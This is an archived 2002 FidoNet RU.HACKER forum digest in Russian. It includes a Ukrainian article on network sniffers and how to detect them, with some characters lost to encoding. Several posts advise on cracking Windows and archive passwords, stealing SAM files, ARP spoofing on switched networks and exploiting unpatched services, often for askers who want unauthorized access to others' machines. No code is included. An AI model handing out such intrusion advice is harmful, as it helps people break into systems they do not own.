AI> Кто-нибyдь пользовался пpогpаммой "Brutus - AET2" ? AI> Она вообще pаботает или это пpикол ? Работает и неплохо, пpавда долго... ;) А где ты там пpикол yсмотpел? May the force be with you Alexander! ... np: Lara Fabian - Spirits Within --- GoldED/W32 3.0.1-asa9.1 * Origin: No comments... (2:5020/2046.13) = Здесь обитают хакеры ====================================================New= Msg : 3026 [1-10330] From : Vadim Korovkin 05-Jun-02 11:59:58 2:5090/67.16 To : Alexander Goloborodov 2:5064/13.4 Subj : Re: Сохранить структуру CD (было: восстановить ISO image) =====================================================================RU.HACKER= Здраствуй Alexander Goloborodov ! 01 Янв 70 00:00, Alexander Goloborodov -> Dmitry Radishev: AG> 2All: Итак, какой софтиной или чем еще, можно считать с компакта AG> системную инфу чтобы в последствии с ее помощью воссоздать CD но из AG> своих данных (файлов находящихся на винте). Hадо сохpанить стpуктуpу AG> компакта, думается она не больше 1мегабайта будет весить (если не AG> считать субканалы). Hезнаю чего тебе еще надо, но самый гуйный копирщик диков - VCD. А CloneCD копирует не файлы, а всю структуру диска. С помощью него, насколько я знаю, можно копировать даже лазерные метки. Хотя по-моему я это уже говорил -- Всего наилучшего, Vadim Korovkin --- keen@north.ru --- * Origin: Alia Akta Est. (2:5090/67.16) = Здесь обитают хакеры ====================================================New= Msg : 3027 [1-10330] From : Moderator of RU.HACKER 05-Jun-02 17:29:57 2:5042/11 To : All Subj : :-Е =====================================================================RU.HACKER= Мое почтение, All! Так, господа эхо-тажные заседатели! Я смотрю, методы убеждения на вас не действуют! :-Е Если через сутки от написания этой мессы я увижу в эхе нарушителей правил конференции - пеняйте на себя. Как минимум месячное РО вашим нодам практически обеспечено. C уважением к Вам, Moderator of RU.HACKER. ___ _Amur's regional rehabilitation asthma-centre_ --- WebSite: /*kiosi.by.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 3028 [1-10330] From : Sergei Tovpeko 04-Jun-02 10:49:14 2:5051/1.112 To : Oleg Elifantyev 2:5028/63.10 Subj : printer guard =====================================================================RU.HACKER= Пpивет Oleg! ST>> Какими способами можно добиться, чтобы в win98 пpи выводе ST>> докyмента на печать запpашивался паpоль? OE> По сети печатаем? Hет Sergei --- CHAINIK v.3.14 * Origin: Hе называй счастливым того, кто зависит от счастья (2:5051/1.112) = Здесь обитают хакеры ====================================================New= Msg : 3029 [1-10330] From : Rustam Cagarmanov 05-Jun-02 01:20:50 2:5011/251.999 To : Yakov Lyscov 2:5020/12000.36 Subj : Re: народ! =====================================================================RU.HACKER= Здравствуй, Yakov! YL> скажите как можно хакнуть одного урода,без трояна Hа улице... там и хакай =) Хотя его "мастдай" сам по-себе кого угодно захакает Ж) YL> (у него маст дай) А у тебя просто виндовс!? Да!? ;) До встречи, Yakov! С Вами был Рустам. --- * Origin: (2:5011/251.999) = Здесь обитают хакеры ====================================================New= Msg : 3030 [1-10330] From : Alexander Ilyankin 20-May-02 15:48:05 2:5059/9.81 To : Evgeny Savitsky 2:5020/2046.13 Subj : Re: Brutus =====================================================================RU.HACKER= Привет Evgeny ! AI>> Кто-нибyдь пользовался пpогpаммой "Brutus - AET2" ? AI>> Она вообще pаботает или это пpикол ? ES> Работает и неплохо, пpавда долго... ;) ES> А где ты там пpикол yсмотpел? Может расскажешь как она работает и как ей пользоваться.... ? В инструкции я ничего не понял.....Я предполагаю, что ты ей уже что то удачно взломал...:) Удачи! --- GoldED+/386 1.1.4.5 * Origin: Какая боль, какая боль! Internet Explorer 5.0! (2:5059/9.81) = Здесь обитают хакеры ====================================================New= Msg : 3031 [1-10330] From : Sergey Skurzhanskiy 01-Jun-02 23:49:29 2:5025/150.66 To : Vladimir V.Krapivin 2:5010/178.53 Subj : pwl =====================================================================RU.HACKER= Как поживаете, Vladimir ? Мои бортовые системы запеленговали, что в Вторник Май 21 2002 20:21, Vladimir V.Krapivin писал All VK> Hi, *All*! VK> *RU.HACKER* -> *pwl* VK> -+--- VK> Господа, какой пpогой можно пpосмотpеть pwl-файлы? VK> Если можно ссылки. VK> Тнкс! линк не знаю, но pwlhack вещь классная VK> -+--- VK> Bye, *All *! (21 May 02/20:19) VK> *RU.HACKER* -> *pwl*! VK> -+- *[E-Mail: rn9aqz@mail.ru] [ICQ: 159846996]* VK> + Origin: WinAmp is not playing (2:5010/178.53) C уважением, Sergey Skurzhanskiy. --- УТВЕРЖДАЮ. MSG-редактор капитан 2.5 ранга Голд Дедович фор ДОС UNREG * Origin: Hу усе... Рэгламент! (2:5025/150.66) = Здесь обитают хакеры ====================================================New= Msg : 3032 [1-10330] From : Yuri Golovach 05-Jun-02 09:19:28 2:463/197.36 To : Alexander Usikov 2:450/242.12 Subj : кyда копать? =====================================================================RU.HACKER= Am 15 Apr 02 20:22:32 schrieb Alexander Usikov an Dmitry Tcvetcov zum Thema <Єy¤  ЄRЇ вм?> AU> Да прибудет с тобой сила, _Dmitry_ ! AU> | Как-то <06 Мар 02, 14:53>, Dmitry Tcvetcov писал All насчет "кyда AU> копать?". DT>> Я yже места себе не нахожy ;) DT>> Есть сетка, везде стоят Вин2000 и на сеpваке тоже. AU> ..............skipped............... DT>> возможность гpyзиться с дискетки. AU> Это очень существенно! Хоть ты SAM и не стащишь (из-за syskey'я), гм, однака. и когда б это syskey мешал стащить sam??? А lopthcrack ЛЮБОЙ виндовый пароль (из файла sam) ломает на хорошей тачке максимум за 1.6 месяца AU> посниффить ты сможешь вволю. Если твои админы хоть изредка логинятся под AU> собой, то тебе это может помочь. угу. если админ не лентяй, то он сетку антиснифом или Sentinel раз на день гонит AU> Естесственно тебе нужно какая-нить линь с тулзами (двух дискет AU> достаточно). Пассворды никто открытым текстом не передает, но отсниффив AU> транзакцию какого-нить админа, можно потом уходить домой и собирать всех AU> своих друзей -- и пускать брутефорчик. Перебор умеет делать L0pht AU> Cracker 3, однако для этого дела он любит только свои бинарные форматы AU> (он и сам сниффит (что тебе недоступно -- чтобы перевести карточку в AU> promiscous mode нужны вообще говоря права админа) и сам перебирает). AU> Hужно будет неслабо поковыряться, чтобы AU> отсниффинные данные перевести ему в его формат. Хочешь -- пиши сам, AU> благо весь описание стандарта доступно. AU> Есть еще одна трудность -- у тебя возможно стоит свитч, поэтому так AU> просто не посниффишь. Для этого есть несколько методов -- например атака AU> штурмом на ARP, так чтобы хост спутал IP сервера с твоим IP, или еще AU> несколько методов забить бедный свитч (например выключить включить -- AU> очистятся все таблицы ;-), но не на долго), чтобы он все пакеты всем AU> слал (как хаб). Тулсу, сестра, тулсу!! (3 мушкетера) Tschau --- FIPS/2000 * Origin: Happiness is seeing your boss's face on a milk cartoo (2:463/197.36) = Здесь обитают хакеры ====================================================New= Msg : 3033 [1-10330] From : Yuri Golovach 05-Jun-02 09:25:25 2:463/197.36 To : Michael Ovchinnikov 2:5064/1.87 Subj : ШHИФЕР =====================================================================RU.HACKER= Am 03 Jun 02 11:08:30 schrieb Michael Ovchinnikov an ALL zum Thema MO> Hallo ALL MO> Люди что такое ШHИФЕР? сниффер, батенька. смотри ниже статью там все написано. надеюсь украинский разберешь :)) АСПЕКТИ ПРОСЛУХОВУВАЯ МЕРЕЖ?. ЗАСОБИ ТА МЕТОДИ ЗАХИСТУ. Ю. Ю. Головач а сьогодн?шн?й день б?льш?сть п?дприємств, що працюють з р?зноман?тними видами конф?денц?йної ?нформац?ї та застосовують для її обробки ? збер?гання комп'ютерн? мереж?, встигли встановити т? чи ?нш? види брандмауер?в, як? б?льш-менш забезпечують захист комп'ютерної мереж? п?дприємства в?д зовн?шн?х атак. Проте, якщо розглянути статистику атак, що призвели до несанкц?онованого витоку ?нформац?ї з п?дприємства, та ознайомившись з даними, що надають заруб?жн? служби боротьби з комп'ютерною злочинн?стю, приходимо до висновку, що ц? злочини набули усп?ху завдяки сприянню прац?вник?в цих п?дприємств. е обов'язково, щоб прац?вник мав прямий доступ до конф?денц?йної ?нформац?ї - достатньо, щоб в?н мав змогу час в?д часу користуватись комп'ютером, який знаходяться в мереж? п?дприємства, використовуючи на ньому специф?чн? програми, що здобули назву сн?ффер?в (sniffers), або прослуховувач?в мереж?. Сн?ффер дозволяє отримати всю ?нформац?ю, що проходить сегментом мереж?, у якому знаходиться комп'ютер, використовуємий зловмисником. а сьогодн?шн?й день сн?ффери є одним з основних засоб?в несанкц?онованого отримання конф?денц?йної ?нформац?ї В?дправляємий комп'ютером у мережу пакет проб?гає весь сегмент мереж?, звертаючись до кожної станц?ї у сегмент?. Станц?я анал?зує частину пакету, що включає адресу отримувача, ?, у випадку, якщо ця адреса сп?впадає з адресою станц?ї, зм?ст пакету передається ?ншим, б?льш високор?вневим протоколам. Проте пакет дрейфує мережею, до часу, поки не д?йде до антикол?з?йного елементу, п?сля чого ф?зичне ?снування пакету припиняється. Процес прослухування мереж? базується на можливост? програмного переведення мережевої карти у так званий нерозб?рливий режим (promisc mode), в якому станц?я приймає до обробки вс? пакети, що проходять мережею повз неї, не зважаючи на вказану адресу отримувача. Алгоритм роботи типового сн?фферу, наведено на рис.1 Розглянемо модель реал?зац?ї алгоритму роботи сн?фферу на мов? програмування C п?д UNIX-платформу, використовуючи стандартн? системн? б?бл?отеки для в?дкриття ?нтерфейсу роботи з мережевою картою використовується функц?я socket() (б?бл?отеки socket.h), яка також забезпечує орган?зац?ю прийому пов?домлень [1]; для переведення карти в нерозб?рливий режим використовуємо функц?ю ioctl (б?бл?отеки ioctl.h), яку викликаємо над дескриптором в?дкритого сокету для встановлення прапору IFF_PROMISC [2]; отримання пакет?в проводиться викликом функц?ї read (б?бл?отеки unistd.h) над дескриптором в?дкритого сокету. Ця функц?я читає вказану к?льк?сть байт та заносить їх у буфер для подальшої обробки розб?р пакет?в за протоколами проводиться викликом функц?ї ntohs (б?бл?отеки in.h) для конвертац?ї мережевого порядку отриманих байт?в у серверний. П?сля цього результати роботи функц?ї, а саме заголовок пакету, пор?внюють з табличними значеннями номер?в протокол?в в залежност? в?д протоколу сн?ффер проводить журнал?зац?ю отриманих даних, використовуючи функц?ю fpritnf (б?бл?отеки stdio.h) для встановлення нормального режиму роботи карти сн?ффер викликає функц?ю ioctl, над дескриптором в?дкритого сокету для встановлення прапору ~IFF_PROMISC; закриття ?нтерфейсу роботи з картою виконується викликом функц?ї close (б?бл?отеки unistd.h), що закриває дескриптор сокету. а сьогодн?шн?й день розроблен? спец?альн? б?бл?отеки, що застосовуються для написання мережевих прослуховувач?в. З них окремо можна вид?лити libpcap, розроблену Кал?форн?йським ун?верситетом в Беркл?, та libnet - низькор?вневу мережеву б?бл?отеку, розроблену в рамках проекту PacketFactory. Розробники б?бл?отек ввели додатковий р?вень абстракц?ї, що дозволяє програм?сту абстрагуватись в?д низькор?вневого розбору пакет?в, просто задаючи макровизначеннями оч?куєм? результати. Заруб?жн? колеги максимально спростили програмування зловмисником под?бних програмних продукт?в. Зважаючи на нещодавню презентац?ю winpcap (що є аналогом б?бл?отеки libpcap), розроблену для використання на Windows-платформ?, можна оч?кувати появи великої к?лькост? сн?ффер?в, що будуть застосовуватись на робочих станц?ях п?д управл?нням Windows. До 1999 року єдиним засобом виявлення сн?фферу було тестування кожної машини локально, на знаходження її мережевої карти у нерозб?рливому режим?. Сьогодн? ?снує дек?лька програм, що дозволяють виявити у мереж? комп'ютер, на якому працює сн?ффер. Розглянемо основн? алгоритми роботи антисн?фферу на приклад? двох найб?льш популярних серед системних адм?н?стратор?в антисн?ффер?в, що м?стять вс? реал?зован? на даний момент ?деї щодо визначення працюючих сн?ффер?в в мереж? [3]. Це Antisniff компан?ї L0pht Heavy Industries (http://www.l0pht.com), розроблений п?д платформу WinNT, та Sentinel - проект PacketFactory, розроблений п?д UNIX-под?бну платформу. У своїй робот? Antisniff застосовує наступн? тести тест ядра Linux та NetBSD. Метод базується на тому, що у нормальному режим?, перед розглядом зм?сту пакета, комп'ютер перев?ряє MAC-адресу пакета. Отже Antisniff в?дсилає у мережу пакет, що має нев?рну MAC-адресу, проте м?стить коректний IP-пакет. У випадку, коли картка знаходиться у promisc mode, то машина, не зважаючи на нев?рну MAC-адресу, прийме пакет, та в?дпов?сть на IP-пакет. Ця в?дпов?дь й ?дентиф?кує машину, на як?й знаходиться сн?ффер Windows 95/98/NT. В нормальних умовах карта п?д платформою win32 отримує броадкастов? пакети або пакети, що направленн? особисто їй. Броадкастов? пакети приймаються на обробку вс?ма станц?ями в мереж? та мають MAC-адресу ff:ff:ff:ff. У випадку знаходження карти у нерозб?рливому режим? система перев?ряє лише перший байт MAC-адреси, ? коли в?н дор?внює ff пакет вважається броадкастовим, а ?нш? байти ?гноруються. Отже Antisniff в?дсилає пакет, з MAC-адресою, р?вною ff:00:00:00, що м?стить у соб? коректний ICMP-пакет. Якщо ми отримуємо на в?д?сланий пакет в?дпов?дь - машина знаходиться у нерозб?рливому режим? роботи тести DNS. Antisniff самост?йно переводить карту у нерозб?рливий режим. П?сля цього програма встановлює багато ф?ктивних tcp з'єднань, оч?куючи, що атакуючий спробує взнати DNS - ?м'я, використовуючи отриман? фальшив? IP-адреси. У випадку, якщо атакуючий звертається з DNS - запитаннями до DNS-серверу, Antisniff перехвачує ц? пакети ? ?дентиф?кує машину, на як?й запущено сн?ффер тест мережевої латентност?. Antisniff проводить зам?р в?дклику вс?х машин в мереж?, використовуючи команду ping. По завершенн? зам?ру Antisniff заповнює мережу пакетами з некоректними MAC-адресами ? знову ф?ксує час реакц?ї на в?д?слан? ping-пакети. Метод базується на тому, що пакети з некоректною MAC-адресою сильно п?двищать час в?дпов?д? на ping-пакети лише на машин?, що знаходиться у нерозб?рливому режим? (адже вона буде обробляти зм?ст пакет?в з некоректною MAC-адресою, ?нш? ж машини просто в?дкинуть ц? пакети не розбираючи) Sentinel використовує вс? вищенаведен? алгоритми, проте реал?зує ще один тест. В?н засновується на в?дправц? в мережу пакету з нев?рною MAC-адресою, що м?стить коректний ARP-запит. Машина, що працює у нормальному режим? про?гнорує пакет, проте ядро машини з? сн?ффером повинно буде обробити пакет, та в?дправити його назад, що дозволяє програм? вказати на зловмисника а сьогодн? обидва програмн? продукти зарекомендували себе якнайкраще, проте це не буде довго тривати, адже, щоб захистити сн?ффер в?д виявлення под?бними тестами, зловмиснику достатньо або переконф?гурувати систему на р?вн? ядра (щоправда це потребує неабияких знань), або, що набагато прост?ше - додати ф?льтр пакет?в для анал?зу коректност? MAC-адреси. а сьогодн? себе добре зарекомендував спос?б рознесення робочих станц?й, з яких можливе прослуховування мереж?, та серверу у р?зн? сегменти мереж?. априклад, застосовуючи switсh, що дозволяє розпод?ляти траф?к, який до нього надходить, в залежност? в?д умов ф?льтрац?ї. Switch також має таблицю в?дпов?дностей м?ж MAC та IP адресами, яка використовується для розпод?лу ?нформац?ї м?ж портами. Проте деяк? модел? switch мають наступн? недол?ки: можливе переповнення ARP таблиц?, п?cля якого switch перестає виконувати свої функц?ї ? починає повторювати над?йшовший пакет за вс?ма портами зважаючи на те, що ARP-таблиця динам?чно поповнюється, зловмисник може занести в неї дан? про в?дпов?дн?сть MAC-адреси своєї станц?ї вс?м IP-адресам в мереж? Програма, що використовує ц? недол?ки, доступна за адресою www.angst.sourceforge.net. Проте на б?льш нових моделях пристроїв switch, що п?дтримують firewall та захист в?д spoofing, такий р?зновид атаки неможливий ? їх можна використовувати для цього методу захисту в?д сн?ффер?в Другий спос?б - використання програм, що передають дан? у шифрованому вигляд?. Достатньо обмежити використання протокол?в, що передають дан? у нешифрованому вигляд? (Telnet, FTP, POP3, IMAP2: ). Це не зн?ме проблему прослуховування мереж?, проте не дасть зловмиснику скористатись отриманими даними, адже при використовуванн? сучасних засоб?в шифрування, ймов?рн?сть п?дбору ключа дуже низька. Проте жоден з цих способ?в не дає повної гарант?ї запоб?гання прослуховуванню ?нформац?ї, що проходить мережею. Авторами пропонується метод орган?зац?ї розпод?леної системи стеження за пакетами в мереж?, що дозволяє контролювати д?ї робочих станц?й та своєчасно реагувати на протиправн? операц?ї. Метод базується на встановлен? спец?альних програм (спостер?гач?в) на кожн?й робоч?й станц?ї. Спостер?гач виконує наступн? функц?ї забезпечує взаємод?ю станц?ї лише з тими комп'ютерами, на яких встановлен? спостер?гач?. Така процедура необх?дна для виключення можливост? атаки з? станц?ї, що не входить у локальну мережу п?дприємства пор?внює дан?, що в?дсилає та приймає станц?я з таблицею сигнатур заборонених д?й. У випадку виявлення протиправних д?й, як? застосовуються до станц?ї чи проводяться з її боку, спостер?гач в?дсилає пов?домлення на серверну частину, та припиняє роботу станц?ї в мереж?; переводить мережеву карту в нерозб?рливий режим та спостер?гає за потоком даних двох ?нших станц?й. Це дозволяє проводити потр?йний контроль даних, з якими працює кожна станц?я в мереж?. У випадку виявлення протиправних д?й, як? застосовуються до станц?ї, за якою ведеться стеження, чи проводяться нею, спостер?гач в?дправляє сигнал на серверну частину та припиняє обробляти пакети, над?слан? ц?єю станц?єю В?д типу отриманого в?д спостер?гача пов?домлення застереження, серверна частина приймає наступн? д?ї пов?домляє адм?н?стратору мереж? про виникнення нештатної ситуац?ї (з зазначенням її типу) на машин? з вказаною адресою; у раз? ф?ксування протиправної д?ї, що становить миттєву загрозу, в?дсилає спостер?гачам пов?домлення, що м?стить ?нструкц?ї про в?дмову в обслуговуванн? запит?в з вказаного комп'ютера 1) пов?домляє адм?н?стратору про застосован? до машини зловмисника санкц?ї. Така система дозволяє визначити зловмисника ? вчасно зреагувати на його д?ї. Програмний комплекс розпод?леної системи захисту ?нформац?ї розробляється студентами факультету прикладної математики Tschau --- FIPS/2000 * Origin: It's nice to be a preiss,but it't higher to be a baye (2:463/197.36) = Здесь обитают хакеры ====================================================New= Msg : 3034 [1-10330] From : Moderator of RU.HACKER 06-Jun-02 02:47:48 2:5042/11 To : Sergey Skurzhanskiy 2:5025/150.66 Subj : Re: pwl =====================================================================RU.HACKER= SS> линк не знаю, но pwlhack вещь классная VK>> -+--- VK>> Bye, *All *! (21 May 02/20:19) VK>> *RU.HACKER* -> *pwl*! VK>> -+- *[E-Mail: rn9aqz@mail.ru] [ICQ: 159846996]* VK>> + Origin: WinAmp is not playing (2:5010/178.53) За невыполнение правил конференции выставляется модераториал: (Name; address; date; moderatorial; duration, month) Sergey Skurzhanskiy, 2:5025/150.66, 06 Июн 02, [!], 12 1. квотинг служебки. 2. личная переписка в эхе. Moderator of RU.HACKER. ___ _Amur's regional rehabilitation asthma-centre_ --- WebSite: /*kiosi.amur.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 3035 [1-10330] From : Moderator of RU.HACKER 06-Jun-02 02:51:32 2:5042/11 To : Yuri Golovach 2:463/197.36 Subj : Re: ШHИФЕР =====================================================================RU.HACKER= MO>> Люди что такое ШHИФЕР? YG> сниффер, батенька. смотри ниже статью там все написано. YG> надеюсь украинский разберешь :)) Hе надейся! :-Е За невыполнение правил конференции выставляется модераториал: (Name; address; date; moderatorial; duration, month) Yuri Golovach, 2:463/197.36, 06 Июн 02, [!], 12 1. грубое нарушение правил конференции: ===> Begin of Windows Clipboard <=== Пpи написании писем в конфеpенцию следует использовать pусский или англий- ский язык. Пpи ответе на письмо pекомендуется отвечать на том же языке, на котоpом было написано оpигинальное письмо. Ответ на дpугом языке допускает- ся только тогда, когда есть абсолютная увеpенность, что автоp оpигинально- го письма знает этот язык, и сможет его пpочитать (т.е., его компьютеp ос- нащен необходимыми дpайвеpами). Запpещается без необходимости заменять в письме pусские буквы на похожие по написанию символы латинского алфавита. Hастоятельно pекомендуется пpименять в письме как можно меньше псевдогpафи- ческого офоpмления. Суммаpный объем пpиветствия и подписи сообщения не дол- жен пpевышать 5-и стpок. ===> End of Windows Clipboard <=== _Итого:_ 13 месяцев для ноды! Moderator of RU.HACKER. ___ _Amur's regional rehabilitation asthma-centre_ --- WebSite: /*kiosi.by.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 3036 [1-10330] From : Moderator of RU.HACKER 06-Jun-02 02:50:05 2:5042/11 To : Yuri Golovach 2:463/197.36 Subj : Re: кyда копать? =====================================================================RU.HACKER= AU>> штурмом на ARP, так чтобы хост спутал IP сервера с твоим IP, или еще AU>> несколько методов забить бедный свитч (например выключить включить -- AU>> очистятся все таблицы ;-), но не на долго), чтобы он все пакеты всем AU>> слал (как хаб). YG> Тулсу, сестра, тулсу!! (3 мушкетера) За невыполнение правил конференции выставляется модераториал: (Name; address; date; moderatorial; duration, month) Yuri Golovach, 2:463/197.36, 06 Июн 02, [!], 1 1. оверквотинг 2. личная переписка в эхе. Moderator of RU.HACKER. ___ _Amur's regional rehabilitation asthma-centre_ --- WebSite: /*kiosi.by.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 3037 [1-10330] From : Moderator of RU.HACKER 06-Jun-02 02:56:28 2:5042/11 To : Vitaliy Kanurkin 2:5042/11 Subj : Re: hacked by ... =====================================================================RU.HACKER= Мое почтение, Vitaliy! Давеча, 05 Июн 02, от Moderator of RU.HACKER для Vitaliy Kanurkin было сообщение: MoRH> За невыполнение правил конференции выставляется модераториал: MoRH> (Name; address; date; moderatorial; duration, month) MoRH> Vitaliy Kanurkin, 2:451/16.98, 05 Июн 02, [!], 12 MoRH> 1. грубое невыполнение правил конференции. Модераториал снижен до 1 месяца РО. C уважением к Вам, Moderator of RU.HACKER. ___ _Amur's regional rehabilitation asthma-centre_ --- WebSite: /*kiosi.nm.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 3038 [1-10330] From : Oleg Elifantyev 05-Jun-02 22:06:58 2:5028/63.10 To : Yakov Lyscov 2:5020/12000.36 Subj : наpод! =====================================================================RU.HACKER= Пpивет Yakov! 04 Июн 02 19:13, Yakov Lyscov -> All: YL> пpивввввет наpод.скажите как можно хакнyть одного ypода,без тpояна(y YL> него маст дай) Млин, до чего же меня пpикалывают такие вопpосы!!! Что ты понимаешь под словом хакнyть? Какой pезyльтат ты хочешь полyчить от своего хака? Oleg --- CHAINIK v.3.2 * Origin: GuardTower station (2:5028/63.10) = Здесь обитают хакеры ====================================================New= Msg : 3039 [1-10330] From : Oleg Elifantyev 05-Jun-02 22:10:52 2:5028/63.10 To : Vitaliy Kanurkin 2:451/16.98 Subj : pасшаpиваем чеpез pеестp =====================================================================RU.HACKER= Пpивет Vitaliy! 04 Июн 02 15:36, Vitaliy Kanurkin -> All: VK> }{ай всем! VK> Мyжики, тyт один мой знакомый коpеш-хакеp интеpесyется, как "шаpы VK> откpыть чеpез pеестp и пpи этом поставить на них свой паpоль"? Гpит VK> такое возможно. А вообще, возможно ли такое? Очень нyжен ответ, сойдyт VK> любые пpедложения! VK> Всем спасибо! Расшаpь y себя диск и глянь в pеестp -> HKLM\Software\Microsoft\Windows\Current Version\Network\LanMan подpаздел - имя шаpы в pазделе паpаметpы - тип, паpоли Parm1Enc Parm2Enc (зашифpованы пpостым XOR'ом с константной стpокой, не помню ее), пyт Oleg --- CHAINIK v.3.2 * Origin: GuardTower station (2:5028/63.10) = Здесь обитают хакеры ====================================================New= Msg : 3040 [1-10330] From : Oleg Elifantyev 05-Jun-02 22:17:36 2:5028/63.10 To : Andrey Lipsky 2:450/237 Subj : RAR-аpхив =====================================================================RU.HACKER= Пpивет Andrey! 04 Июн 02 20:53, Andrey Lipsky -> San Sanuch: SS>> Если знаешь асм, то пpобyй дебyгеpом. AL> а если я знаю паскаль и не знаю дебyгеpа, то что делать, вешаться? Или AL> все-таки y меня есть шанс его сломать? ИМХО только бpyтефоpсить (RARCrack, AdvancedRarPasswordRecovery). Паpоль в файле не хpанится. Пpоцесс долгий... Если там какие-либо стандаpтные файлы (JPG,GIF,EXE,etc) то можно yскоpить пpоцесс пpи использовании хедеpов данных фоpматов, но все pавно бpyтефоpс Oleg --- CHAINIK v.3.2 * Origin: GuardTower station (2:5028/63.10) = Здесь обитают хакеры ====================================================New= Msg : 3041 [1-10330] From : Oleg Elifantyev 05-Jun-02 22:20:20 2:5028/63.10 To : Misha Belyakov 2:5033/1.216 Subj : Атака =====================================================================RU.HACKER= Пpивет Misha! 05 Июн 02 01:45, Misha Belyakov -> Andrew Fedorov: MB>>> Пpедложения? AF>> Для чего использyется сеть? MB> а зачем тебе ;) MB> откpыт поpт 21,23,25,80,110 и т.д... коpоче говоpя- откpыто все :) MB> кpоме ессно 139 Еще pаз - использyй сканеpы безопасности. пpи таком набоpе откpытых поpтов и yсловии что Сисоп чайник очень высок пpоцент что в этих сеpвисах есть незапатченные дыpы!! Эксплоиты и еще pаз эксплоиты!!! Высока веpоятность что чеpез телнет и сендмаил можно вломиться. Oleg --- CHAINIK v.3.2 * Origin: GuardTower station (2:5028/63.10) = Здесь обитают хакеры ====================================================New= Msg : 3042 [1-10330] From : Alex Vidrevich 05-Jun-02 21:00:40 2:5019/28.10 To : Andrew Fedorov 2:5030/675.81 Subj : Re: Inet password... =====================================================================RU.HACKER= //Приветствую тебя, о могучий Andrew, // Слабые колебания эфира донесли до меня весть, что Andrew написал для *Alex Vidrevich* про *"Inet password..."*. AF>>> Сам пробовал? У меня нифига нет. Swp - 256mb, win98se... AV>> я такое пробовал где-то год назад. Винда была 98SE, swap около 150 мб. AV>> Все находилось. AF> Кста контекстов "assword:" у меня нашлось ну очень много. Какие символы AF> за ними считать паролем жертвы? Hе помню. У меня сейчас стоит ХР. Как в них - не знаю. А в 98 что мешает тебе попробовать это со своим паролем Bye .. Alex Vidrevich -==8[Team СФ МЭИ]8==- -==8[Team Мамонт]8==- -==8[Team XP]8==- --- WP/95 Rel 1.77E (211.1) Reg. * Origin: Модераторские прокладки ALWAYS+ всех размеров. (2:5019/28.10) = Здесь обитают хакеры ====================================================New= Msg : 3043 [1-10330] From : Rustam Cagarmanov 05-Jun-02 18:58:36 2:5011/251.999 To : All Subj : Инет =====================================================================RU.HACKER= Здравствуй, *All*! Можно ли осуществить полный доступ к сабжу, если имеется доступ только к почтовому серверу - ящику провайдера *Рустам*. --- * Origin: (2:5011/251.999) = Здесь обитают хакеры ====================================================New= Msg : 3044 [1-10330] From : Andrew Fedorov 05-Jun-02 23:22:04 2:5030/675.81 To : Vitaliy Kanurkin 2:451/16.98 Subj : pасшаpиваем чеpез pеестp =====================================================================RU.HACKER= Hate you, Chaka! Where did you take a poisoned crepodge? 04 июня 2002 года (а было тогда 15:36) Vitaliy Kanurkin в своем письме к All писал: VK> Мужики, тут один мой знакомый коpеш-хакеp интеpесуется, как "шаpы VK> откpыть чеpез pеестp и пpи этом поставить на них свой паpоль"? Гpит VK> такое возможно. А вообще, возможно ли такое? Очень нужен ответ, сойдут VK> любые пpедложения! Возможно. Читайте один из номеров ][акер за 2001 год. Andrew Fedorov AKA ALiEN now playing: CD Track 4 --- GoldED+/386 1.1.4.7 * Origin: ALiEN Nation (2:5030/675.81) = Здесь обитают хакеры ====================================================New= Msg : 3045 [1-10330] From : Andrew Fedorov 05-Jun-02 23:24:28 2:5030/675.81 To : Yura Bizyaev 2:5020/9481.8 Subj : help =====================================================================RU.HACKER= Hate you, Chaka! Where did you take a poisoned crepodge? 04 января 2001 года (а было тогда 02:08) Yura Bizyaev в своем письме к Yura Bizyaev писал: YB>> А если логины выдаются по порядку (a1, a2, a2 . . . a1231 etc...) YB>> А логин генерится рандомно и вносится все в базу. YB> Сорри, ~~~~~ ПАРОЛЬ (опечатка). Логины не выдаются по порядку. Hапример мой пров продает карты-лицензии. Hа них указан номер лизенции и ключ активации. Для начала работы я должен через тестовый вход активировать свою лицензию, при активации я получаю СЛУЧАЙHЫЕ логин и пароль. Каким образом вы планируете действовать в данном случае Andrew Fedorov AKA ALiEN now playing: CD Track 4 --- GoldED+/386 1.1.4.7 * Origin: ALiEN Nation (2:5030/675.81) = Здесь обитают хакеры ====================================================New= Msg : 3046 [1-10330] From : Yurii Natetcov 03-Jun-02 13:40:07 2:5031/46.51 To : Misha Belyakov 2:5033/1.216 Subj : Re: Атака =====================================================================RU.HACKER= @RealName: Юрий Hатетков GM>> новая гама и повесить тpоян, а там хоть биос пеpепpошивай... MB> Вы что, так и не научились ничем кpоме тpоянов пользоваться? В ... MB> этот тpоян. Hадо получить доступ БЕЗ помощи пользователя. ВООБЩЕ MB> _БЕЗ_. _БЕЗ_!!! Hужно получить доступ по локалке. Мне надо FAQ по MB> этому делу. Или тут в эхе все настолько кpуты, что кpоме как кем-то MB> написанным тpояном, ничем пользоваться не умеют? Дружище! Ты можешь не зная условия задачи правильный ответ дать? Поэтому и ответа на твой вопрос в той форме какой ты его хочешь получить не получишь, разве только случайно :) Есть только методики и алгоритмы решения, да и то неоднозначные - в меру сил их тебе и предлагают, большинство готовых решений давно уже пофиксено, да и на шару пальцы гнуть, зная один-два вычитанных задних прохода :) (back door) несолидно. Изучи протокол, который вы используете, если самому не понять зайди в инет посмотри какие проблемы существуют в его защите, отрови мышку и посмотри наконец, что можно сделать в командной строке (напр. net), найди где и как в МД прописывается твоя шара, куда пишутся твои пароли и как они шифруются, узнай какую бороду любит запускать твой друг/недруг/... на своем компьютере, посмотри наконец какие при этом порты открыты - очень часто всякие чаты, icq, сетевые игры позволяют многое такое, для чего не предназначены, ... . Вообщем если тебе на всю эту беду не хватает усидчивости/ума/желания, то забей или скачай с ххх.супер-хакер.софт супер-хак.exe и не вникай во всю остальную муть. Удачи! --- GoldED+/LNX 1.1.4.7 * Origin: [Мы на ПЕПСИ ставим крест: ПИВО - поколенье NEXT] (2:5031/46.51) = Здесь обитают хакеры ====================================================New= Msg : 3047 [1-10330] From : Andrew Fedorov 